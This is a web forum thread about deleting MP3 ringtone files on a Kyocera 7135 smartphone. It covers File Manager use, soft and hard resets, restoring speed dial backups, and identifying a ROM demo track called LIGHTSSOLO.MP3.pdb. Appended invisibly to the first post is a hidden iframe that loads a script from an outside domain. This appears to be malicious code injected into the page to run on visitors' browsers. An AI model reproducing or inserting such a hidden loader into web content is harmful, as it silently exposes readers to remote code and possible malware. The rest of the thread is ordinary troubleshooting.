+ Reply to Thread
Page 1 of 2 1 2 LastLast

How do you delete an mp3 ringer

Before someone gets on my case, I've done a search and could not get any hits. Plus I browsed through the mp3 threads and count not find anyome who has discussed this yet. I think everybody has been too happy about installing ringers that no one has thought about deleting them.

Unfortunately, I am down to 3 MB of free space left. Plus, I somehow installed a 1 MB ringer. Don't remember where I got it. File Manager will not allow you to delete since the MP3 player is a read-only app. Is there some application out there that can do this. Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

iPhone therefore iAm.

The built in file manager does it as well.

I thought that would work too.

jb40967, you don't want to delete the mp3 player, just look for the Ringer files. (.pdb)
    iPhone therefore iAm.

how do you erase ringers?

I was wondering how I go about erasing some of the downloaded ringers I am not using.

Use the file manager, find the file, and erase it.

Originally posted by HoTSynC
    Use the file manager, find the file, and erase it.
    I might be mistaken, but after deleting the ringer files, you will have to perform a soft reset to clear the ringer out of the phone or you could have complications
    Dan

Deleting MP3 Ringer Tones

I recently created several MP3 Ring tones for my phone and successfully downloaded them to the 7135.

However, when I deleted several (using File Manager) - The name of the file still appears in the Phone Preferences Ringer List - AND if you accidently try to activate it with the file being deleted your 7135 will experience the Inverse Screen that causes you to perform a Hard Reset to correct.

The Hard Reset wasn't a big deal, since I regularly back up to the desk top, except all of my speed dial information was lost.

So my questions are as follows:

1) How do you delete MP3 ringer tones created and have the name removed from the phone preference list?

2) Why are speed dial settings not saved as part of the backup hoysync process?
    pvm

Re: Deleting MP3 Ringer Tones

Originally posted by pvm21
    I recently created several MP3 Ring tones for my phone and successfully downloaded them to the 7135.

However, when I deleted several (using File Manager) - The name of the file still appears in the Phone Preferences Ringer List - AND if you accidently try to activate it with the file being deleted your 7135 will experience the Inverse Screen that causes you to perform a Hard Reset to correct.

The Hard Reset wasn't a big deal, since I regularly back up to the desk top, except all of my speed dial information was lost.

1) How do you delete MP3 ringer tones created and have the name removed from the phone preference list?

I imagine you need to do a soft reset after deleting the mp3 ringers to remove the references in the phone_prefs app. In the original firmware versions, you had to do a soft reset after installing them to get the phone to recognize them. I understand that the currently shipping firmware, this is no longer the case, but I don't know if the removed the requirement from deletions as well as additions.

Alan

LIGHTSSOLO.MP3.pdb

Has anybody heard of this mp3 LIGHTSSOLO.MP3.pdb? When I look through FileManager I see this file with the other ringers files, but I do not see it as a ringer choice. I don't know if this is a default MP3, I don't remember downloading it to my phone. When I try to move the file to an SD card, I get an Copy/Move/Deletion Failure, because LIGHTSSOLO.MP3.pdb is read-only. This file is 1.0M, and if it's not needed, I would like to delete it. Also how can I delete this file since I'm getting the above error.

Re: LIGHTSSOLO.MP3.pdb

Originally posted by mbrahm
    Has anybody heard of this mp3 LIGHTSSOLO.MP3.pdb? When I look through FileManager I see this file with the other ringers files, but I do not see it as a ringer choice. I don't know if this is a default MP3, I don't remember downloading it to my phone. When I try to move the file to an SD card, I get an Copy/Move/Deletion Failure, because LIGHTSSOLO.MP3.pdb is read-only. This file is 1.0M, and if it's not needed, I would like to delete it. Also how can I delete this file since I'm getting the above error.
    It is on my system as well. Don't know what it is for.

Alan

Re: Deleting MP3 Ringer Tones

Originally posted by pvm21

I can answer #2:

Your phone does a backup of all of it's files, including the speed dial list. You have to go to the Program folders in your C drive. Find a folder called Palm and open it. Next find the folder that matches the user name you hot sync with and open it. Most cases it will be truncated. Next find and open the folder called Backup. Next find "kwc_SpeedDialDB" and install it like you would any other NEW DB. I double click it to start the install prompt. This may or may not work for you. After you go through the normal install prompt you should hot sync and your done.

Caveat******

If you you hot sync BEFORE you setup this file to install then the hotsync will backup your empty speed dial list. To correct this problem, make a copy of the "kwc_SpeedDialDB" BEFORE you hot sync and move it to another folder, like the desktop. You can do this with your voice dials, and all of your other pref files, however, I would just stick to voice and speed dial as these are the only files that are not "synced" they are just backed up. After you have copied the voice and speed dial DB files in another folder, perform a sync to restore your 7135. Next, copy your original voice and speed dial DBs back to the original folder and overwrite the old files when you are prompted. Next, DO NOT SYNC YET, double click them or install them normally. Once they are in your que to install at next sync perform a sync. You should be okay now!

Re: Re: LIGHTSSOLO.MP3.pdb

Originally posted by alanb
    It is on my system as well. Don't know what it is for.

Alan
    This file is used to control the lights on your display and keypad when in silent mode. If you have installed a MP3 ringtone(s) on your phone and have your phone set to lights only instead of vibe or ring and do not have the file, your phone will do nothing. This is to allow you phone to know that it is ringing with a customer MP3 ringer. Sounds silly I know, however, that is straight from Kyocera tier III. I did not have it on mine until I installed an MP3 ring tone.

Steve

:BigKnife: :alieneyes

Re: LIGHTSSOLO.MP3.pdb

Originally posted by mbrahm
    This file is used to control the lights on your display and keypad when in silent mode. If you have installed a MP3 ringtone(s) on your phone and have your phone set to lights only instead of vibe or ring and do not have the file, your phone will do nothing. This is to allow you phone to know that it is ringing with a customer MP3 ringer. Sounds silly I know, however, that is straight from Kyocera tier III. I did not have it on mine until I installed an MP3 ring tone.

Steve

:BigKnife:

Re: Re: LIGHTSSOLO.MP3.pdb

Originally posted by 7135man

Steve

:BigKnife:
    I think they gave you a line of crap or there's something else we don't know.

I beamed the file to my computer and opened it with Media Player and It plays a MP3 song! I don't think it controls anything at all. The Palm Header indicates it is not a ringer but rather a type of "Demo". The song plays for 1:06 mins has a bitrate of 128kbps and the id3 tag says:

Clip: Lights in a room of mirrors
    Author: Robert F. Hyatt
    Copyright: none
    Rating: none

This a wierd file for sure -- If I was to guess I'd say its supposed to be the Audio Track for the elusive 7135 Demo we heard about a long time ago which was supposed to a video which Sales Reps would play to showoff/explain its featues. Anybody ever actually SEE that demo anyways?
    iPhone therefore iAm.

Has anyone tried to delete the Lightssolo MP3? I would be interested in seeing if there is any change in functionality. If not, they I would quickly trash it to make room for other stuff.

Originally posted by GalenMD
    Has anyone tried to delete the Lightssolo MP3? I would be interested in seeing if there is any change in functionality. If not, they I would quickly trash it to make room for other stuff.
    Well its on the ROM so I don't think its an option for the causal user. However if you're one of the risky people who use jacksprat or jackflash to mess with the ROM files then its your lucky day cause you could save up to 1MB of space by deleting this baby!

I don't see how this file could have any functionality other than music.
    iPhone therefore iAm.

If you go in the MP3 Player and select About MP3 Player, there is a demo button with a fairly lengthy song that plays. I bet that is the LightsSolo MP3

Originally posted by jmegibow
    If you go in the MP3 Player and select About MP3 Player, there is a demo button with a fairly lengthy song that plays. I bet that is the LightsSolo MP3

DING DING DING! We have a winner!

You are correct, I hadn't noticed this before but that demo IS the Lightssolo file. Good Catch jmegibow! Another mystery solved

7135man: looks like we have confirmation that Kyocera tier III wasn't up to speed with their newest hardware, Oh well. We are smarter here anyways
    iPhone therefore iAm.

3_D
    Since this Lightssolo MP3.mpb file is in ROM, how can we delete it? I don't know if Jackflash works on the 7135. I sure would like to delete this 1m file! Any ideas on how to get rid of this baggage (so to speak)?